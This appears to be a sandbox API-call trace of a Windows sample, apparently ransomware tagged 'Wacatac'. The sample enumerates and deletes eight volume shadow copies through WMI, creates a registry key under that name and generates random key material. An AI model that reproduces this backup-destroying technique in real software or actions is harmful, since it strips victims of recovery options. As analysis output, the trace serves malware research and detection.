[0053.126] GetProcessHeap () returned 0x280000 [0053.126] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x80) returned 0x2e0bf0 [0053.126] lstrlenW (lpString="{DC780020-7243-4B55-80A9-4BA6EE67823B}") returned 38 [0053.126] wnsprintfW (in: pszDest=0x2e0bf0, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'") returned 60 [0053.126] IWbemServices:DeleteInstance (in: This=0x82ccfdc, strObjectPath="Win32_ShadowCopy.ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'", lFlags=0, pCtx=0x82cc660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0053.922] GetProcessHeap () returned 0x280000 [0053.922] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e0bf0 | out: hHeap=0x280000) returned 1 [0053.922] IUnknown:Release (This=0x82cd0b8) returned 0x0 [0053.922] IEnumWbemClassObject:Next (in: This=0x82cd07c, lTimeout=-1, uCount=0x1, apObjects=0x17e834, puReturned=0x17e844 | out: apObjects=0x17e834*=0x82cd930, puReturned=0x17e844*=0x1) returned 0x0 [0053.924] IWbemClassObject:Get (in: This=0x82cd930, wszName="id", lFlags=0, pVal=0x17e820*(varType=0x0, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1=0x2e171c, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e820*(varType=0x8, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1="{3DBBFF70-A67F-4333-8498-31E7BC089E0F}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0053.924] lstrlenW (lpString="{3DBBFF70-A67F-4333-8498-31E7BC089E0F}") returned 38 [0053.924] GetProcessHeap () returned 0x280000 [0053.924] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x80) returned 0x2e0bf0 [0053.924] lstrlenW (lpString="{3DBBFF70-A67F-4333-8498-31E7BC089E0F}") returned 38 [0053.925] wnsprintfW (in: pszDest=0x2e0bf0, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'") returned 60 [0053.925] IWbemServices:DeleteInstance (in: This=0x82ccfdc, strObjectPath="Win32_ShadowCopy.ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'", lFlags=0, pCtx=0x82cc660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0054.611] GetProcessHeap () returned 0x280000 [0054.611] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e0bf0 | out: hHeap=0x280000) returned 1 [0054.611] IUnknown:Release (This=0x82cd930) returned 0x0 [0054.611] IEnumWbemClassObject:Next (in: This=0x82cd07c, lTimeout=-1, uCount=0x1, apObjects=0x17e834, puReturned=0x17e844 | out: apObjects=0x17e834*=0x82cd930, puReturned=0x17e844*=0x1) returned 0x0 [0054.612] IWbemClassObject:Get (in: This=0x82cd930, wszName="id", lFlags=0, pVal=0x17e820*(varType=0x0, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1=0x2e0c7c, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e820*(varType=0x8, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1="{1924CB9A-2919-4442-A6C0-E60362A636CF}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0054.612] lstrlenW (lpString="{1924CB9A-2919-4442-A6C0-E60362A636CF}") returned 38 [0054.612] GetProcessHeap () returned 0x280000 [0054.612] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x80) returned 0x2e0bf0 [0054.612] lstrlenW (lpString="{1924CB9A-2919-4442-A6C0-E60362A636CF}") returned 38 [0054.612] wnsprintfW (in: pszDest=0x2e0bf0, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'") returned 60 [0054.613] IWbemServices:DeleteInstance (in: This=0x82ccfdc, strObjectPath="Win32_ShadowCopy.ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'", lFlags=0, pCtx=0x82cc660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0055.296] GetProcessHeap () returned 0x280000 [0055.296] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e0bf0 | out: hHeap=0x280000) returned 1 [0055.296] IUnknown:Release (This=0x82cd930) returned 0x0 [0055.296] IEnumWbemClassObject:Next (in: This=0x82cd07c, lTimeout=-1, uCount=0x1, apObjects=0x17e834, puReturned=0x17e844 | out: apObjects=0x17e834*=0x82cd930, puReturned=0x17e844*=0x1) returned 0x0 [0055.297] IWbemClassObject:Get (in: This=0x82cd930, wszName="id", lFlags=0, pVal=0x17e820*(varType=0x0, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1=0x2e171c, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e820*(varType=0x8, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1="{5555A914-627B-4AF5-A342-EC1A6421363A}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0055.297] lstrlenW (lpString="{5555A914-627B-4AF5-A342-EC1A6421363A}") returned 38 [0055.297] GetProcessHeap () returned 0x280000 [0055.297] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x80) returned 0x2e0bf0 [0055.298] lstrlenW (lpString="{5555A914-627B-4AF5-A342-EC1A6421363A}") returned 38 [0055.298] wnsprintfW (in: pszDest=0x2e0bf0, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'") returned 60 [0055.298] IWbemServices:DeleteInstance (in: This=0x82ccfdc, strObjectPath="Win32_ShadowCopy.ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'", lFlags=0, pCtx=0x82cc660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0055.976] GetProcessHeap () returned 0x280000 [0055.976] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e0bf0 | out: hHeap=0x280000) returned 1 [0055.976] IUnknown:Release (This=0x82cd930) returned 0x0 [0055.976] IEnumWbemClassObject:Next (in: This=0x82cd07c, lTimeout=-1, uCount=0x1, apObjects=0x17e834, puReturned=0x17e844 | out: apObjects=0x17e834*=0x82cd930, puReturned=0x17e844*=0x1) returned 0x0 [0055.977] IWbemClassObject:Get (in: This=0x82cd930, wszName="id", lFlags=0, pVal=0x17e820*(varType=0x0, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1=0x2e0c7c, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e820*(varType=0x8, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1="{C7241040-5C13-409D-A239-55D005C03DE9}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0055.977] lstrlenW (lpString="{C7241040-5C13-409D-A239-55D005C03DE9}") returned 38 [0055.977] GetProcessHeap () returned 0x280000 [0055.977] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x80) returned 0x2e0bf0 [0055.977] lstrlenW (lpString="{C7241040-5C13-409D-A239-55D005C03DE9}") returned 38 [0055.977] wnsprintfW (in: pszDest=0x2e0bf0, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{C7241040-5C13-409D-A239-55D005C03DE9}'") returned 60 [0055.977] IWbemServices:DeleteInstance (in: This=0x82ccfdc, strObjectPath="Win32_ShadowCopy.ID='{C7241040-5C13-409D-A239-55D005C03DE9}'", lFlags=0, pCtx=0x82cc660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0056.620] GetProcessHeap () returned 0x280000 [0056.620] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e0bf0 | out: hHeap=0x280000) returned 1 [0056.620] IUnknown:Release (This=0x82cd930) returned 0x0 [0056.620] IEnumWbemClassObject:Next (in: This=0x82cd07c, lTimeout=-1, uCount=0x1, apObjects=0x17e834, puReturned=0x17e844 | out: apObjects=0x17e834*=0x82cd930, puReturned=0x17e844*=0x1) returned 0x0 [0056.622] IWbemClassObject:Get (in: This=0x82cd930, wszName="id", lFlags=0, pVal=0x17e820*(varType=0x0, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1=0x2e171c, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e820*(varType=0x8, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1="{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0056.622] lstrlenW (lpString="{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}") returned 38 [0056.622] GetProcessHeap () returned 0x280000 [0056.622] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x80) returned 0x2e0bf0 [0056.622] lstrlenW (lpString="{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}") returned 38 [0056.622] wnsprintfW (in: pszDest=0x2e0bf0, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'") returned 60 [0056.622] IWbemServices:DeleteInstance (in: This=0x82ccfdc, strObjectPath="Win32_ShadowCopy.ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'", lFlags=0, pCtx=0x82cc660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0057.225] GetProcessHeap () returned 0x280000 [0057.226] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e0bf0 | out: hHeap=0x280000) returned 1 [0057.226] IUnknown:Release (This=0x82cd930) returned 0x0 [0057.226] IEnumWbemClassObject:Next (in: This=0x82cd07c, lTimeout=-1, uCount=0x1, apObjects=0x17e834, puReturned=0x17e844 | out: apObjects=0x17e834*=0x82cd930, puReturned=0x17e844*=0x1) returned 0x0 [0057.227] IWbemClassObject:Get (in: This=0x82cd930, wszName="id", lFlags=0, pVal=0x17e820*(varType=0x0, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1=0x2e0c7c, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e820*(varType=0x8, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1="{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0057.227] lstrlenW (lpString="{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}") returned 38 [0057.227] GetProcessHeap () returned 0x280000 [0057.227] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x80) returned 0x2e0bf0 [0057.227] lstrlenW (lpString="{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}") returned 38 [0057.227] wnsprintfW (in: pszDest=0x2e0bf0, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'") returned 60 [0057.227] IWbemServices:DeleteInstance (in: This=0x82ccfdc, strObjectPath="Win32_ShadowCopy.ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'", lFlags=0, pCtx=0x82cc660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0057.879] GetProcessHeap () returned 0x280000 [0057.879] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e0bf0 | out: hHeap=0x280000) returned 1 [0057.879] IUnknown:Release (This=0x82cd930) returned 0x0 [0057.879] IEnumWbemClassObject:Next (in: This=0x82cd07c, lTimeout=-1, uCount=0x1, apObjects=0x17e834, puReturned=0x17e844 | out: apObjects=0x17e834*=0x82cd930, puReturned=0x17e844*=0x1) returned 0x0 [0057.882] IWbemClassObject:Get (in: This=0x82cd930, wszName="id", lFlags=0, pVal=0x17e820*(varType=0x0, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1=0x2e171c, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e820*(varType=0x8, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1="{E369493E-E5B4-449B-8539-770BCA375ABB}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0057.882] lstrlenW (lpString="{E369493E-E5B4-449B-8539-770BCA375ABB}") returned 38 [0057.882] GetProcessHeap () returned 0x280000 [0057.882] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x80) returned 0x2e0bf0 [0057.882] lstrlenW (lpString="{E369493E-E5B4-449B-8539-770BCA375ABB}") returned 38 [0057.882] wnsprintfW (in: pszDest=0x2e0bf0, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'") returned 60 [0057.882] IWbemServices:DeleteInstance (in: This=0x82ccfdc, strObjectPath="Win32_ShadowCopy.ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'", lFlags=0, pCtx=0x82cc660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0057.948] GetProcessHeap () returned 0x280000 [0057.948] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e0bf0 | out: hHeap=0x280000) returned 1 [0057.948] IUnknown:Release (This=0x82cd930) returned 0x0 [0057.948] IEnumWbemClassObject:Next (in: This=0x82cd07c, lTimeout=-1, uCount=0x1, apObjects=0x17e834, puReturned=0x17e844 | out: apObjects=0x17e834*=0x82cd930, puReturned=0x17e844*=0x0) returned 0x1 [0057.953] WbemLocator:IUnknown:Release (This=0x82ccfdc) returned 0x0 [0057.954] WbemLocator:IUnknown:Release (This=0x82cc730) returned 0x0 [0057.954] WbemContext:IUnknown:Release (This=0x82cc660) returned 0x0 [0057.954] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Wacatac", ulOptions=0x0, samDesired=0xf003f, phkResult=0x40f1a8 | out: phkResult=0x40f1a8*=0x0) returned 0x2 [0057.954] RegCreateKeyA (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Wacatac", phkResult=0x40f1a8 | out: phkResult=0x40f1a8*=0x610) returned 0x0 [0057.955] GetProcessHeap () returned 0x280000 [0057.955] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x3772d8 [0057.955] GetProcessHeap () returned 0x280000 [0057.955] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x3772a8 [0057.955] GetProcessHeap () returned 0x280000 [0057.955] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x377288 [0057.955] GetProcessHeap () returned 0x280000 [0057.955] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x377298 [0057.955] GetProcessHeap () returned 0x280000 [0057.955] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x2a9a30 [0057.955] GetProcessHeap () returned 0x280000 [0057.955] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x2bfe50 [0057.955] GetProcessHeap () returned 0x280000 [0057.955] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47b38 [0057.955] GetProcessHeap () returned 0x280000 [0057.955] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47b48 [0057.955] GetProcessHeap () returned 0x280000 [0057.955] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47b58 [0057.955] GetProcessHeap () returned 0x280000 [0057.955] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47b68 [0057.955] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x74d40000 [0057.956] GetProcAddress (hModule=0x74d40000, lpProcName="SystemFunction036") returned 0x74d41919 [0057.956] SystemFunction036 (in: RandomBuffer=0x17e780, RandomBufferLength=0x80 | out: RandomBuffer=0x17e780) returned 1 [0057.957] GetProcessHeap () returned 0x280000 [0057.957] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x2a9a30, Size=0x80) returned 0x2e0bf0 [0057.957] GetProcessHeap () returned 0x280000 [0057.957] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x2a9a30 [0057.957] GetProcessHeap () returned 0x280000 [0057.957] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47b78 [0057.957] GetProcessHeap () returned 0x280000 [0057.957] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x102) returned 0x2f1b90 [0057.957] GetProcessHeap () returned 0x280000 [0057.957] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1068) returned 0x2b1490 [0057.957] GetProcessHeap () returned 0x280000 [0057.957] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.957] GetProcessHeap () returned 0x280000 [0057.957] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.957] GetProcessHeap () returned 0x280000 [0057.957] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.957] GetProcessHeap () returned 0x280000 [0057.957] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.957] GetProcessHeap () returned 0x280000 [0057.957] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.957] GetProcessHeap () returned 0x280000 [0057.957] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.957] GetProcessHeap () returned 0x280000 [0057.957] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.957] GetProcessHeap () returned 0x280000 [0057.957] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.957] GetProcessHeap () returned 0x280000 [0057.957] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.957] GetProcessHeap () returned 0x280000 [0057.957] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.957] GetProcessHeap () returned 0x280000 [0057.957] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.957] GetProcessHeap () returned 0x280000 [0057.957] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.958] GetProcessHeap () returned 0x280000 [0057.958] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.958] GetProcessHeap () returned 0x280000 [0057.958] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.958] GetProcessHeap () returned 0x280000 [0057.958] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.958] GetProcessHeap () returned 0x280000 [0057.958] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.958] GetProcessHeap () returned 0x280000 [0057.958] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.958] GetProcessHeap () returned 0x280000 [0057.958] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.958] GetProcessHeap () returned 0x280000 [0057.958] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.958] GetProcessHeap () returned 0x280000 [0057.958] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.958] GetProcessHeap () returned 0x280000 [0057.958] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.958] GetProcessHeap () returned 0x280000 [0057.958] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.958] GetProcessHeap () returned 0x280000 [0057.958] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.958] GetProcessHeap () returned 0x280000 [0057.958] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.958] GetProcessHeap () returned 0x280000 [0057.958] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.958] GetProcessHeap () returned 0x280000 [0057.958] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.958] GetProcessHeap () returned 0x280000 [0057.958] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.958] GetProcessHeap () returned 0x280000 [0057.958] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.958] GetProcessHeap () returned 0x280000 [0057.958] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.958] GetProcessHeap () returned 0x280000 [0057.958] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.958] GetProcessHeap () returned 0x280000 [0057.958] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.958] GetProcessHeap () returned 0x280000 [0057.958] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.958] GetProcessHeap () returned 0x280000 [0057.959] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.959] GetProcessHeap () returned 0x280000 [0057.959] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.959] GetProcessHeap () returned 0x280000 [0057.959] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.959] GetProcessHeap () returned 0x280000 [0057.959] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.959] GetProcessHeap () returned 0x280000 [0057.959] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.959] GetProcessHeap () returned 0x280000 [0057.959] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.959] GetProcessHeap () returned 0x280000 [0057.959] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.959] GetProcessHeap () returned 0x280000 [0057.959] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.959] GetProcessHeap () returned 0x280000 [0057.959] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.959] GetProcessHeap () returned 0x280000 [0057.959] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.959] GetProcessHeap () returned 0x280000 [0057.959] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.959] GetProcessHeap () returned 0x280000 [0057.959] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.959] GetProcessHeap () returned 0x280000 [0057.959] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.959] GetProcessHeap () returned 0x280000 [0057.959] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.959] GetProcessHeap () returned 0x280000 [0057.959] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.959] GetProcessHeap () returned 0x280000 [0057.959] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.959] GetProcessHeap () returned 0x280000 [0057.959] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.959] GetProcessHeap () returned 0x280000 [0057.959] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.959] GetProcessHeap () returned 0x280000 [0057.959] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.959] GetProcessHeap () returned 0x280000 [0057.959] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.960] GetProcessHeap () returned 0x280000 [0057.960] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.960] GetProcessHeap () returned 0x280000 [0057.960] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.960] GetProcessHeap () returned 0x280000 [0057.960] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.960] GetProcessHeap () returned 0x280000 [0057.960] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.960] GetProcessHeap () returned 0x280000 [0057.960] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.960] GetProcessHeap () returned 0x280000 [0057.960] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.960] GetProcessHeap () returned 0x280000 [0057.960] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.960] GetProcessHeap () returned 0x280000 [0057.960] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.960] GetProcessHeap () returned 0x280000 [0057.960] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.960] GetProcessHeap () returned 0x280000 [0057.960] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.960] GetProcessHeap () returned 0x280000 [0057.960] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.960] GetProcessHeap () returned 0x280000 [0057.960] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.960] GetProcessHeap () returned 0x280000 [0057.960] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.960] GetProcessHeap () returned 0x280000 [0057.960] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.960] GetProcessHeap () returned 0x280000 [0057.960] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.960] GetProcessHeap () returned 0x280000 [0057.960] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.960] GetProcessHeap () returned 0x280000 [0057.960] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.960] GetProcessHeap () returned 0x280000 [0057.960] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.960] GetProcessHeap () returned 0x280000 [0057.960] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.960] GetProcessHeap () returned 0x280000 [0057.960] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.961] GetProcessHeap () returned 0x280000 [0057.961] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.961] GetProcessHeap () returned 0x280000 [0057.961] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.961] GetProcessHeap () returned 0x280000 [0057.961] 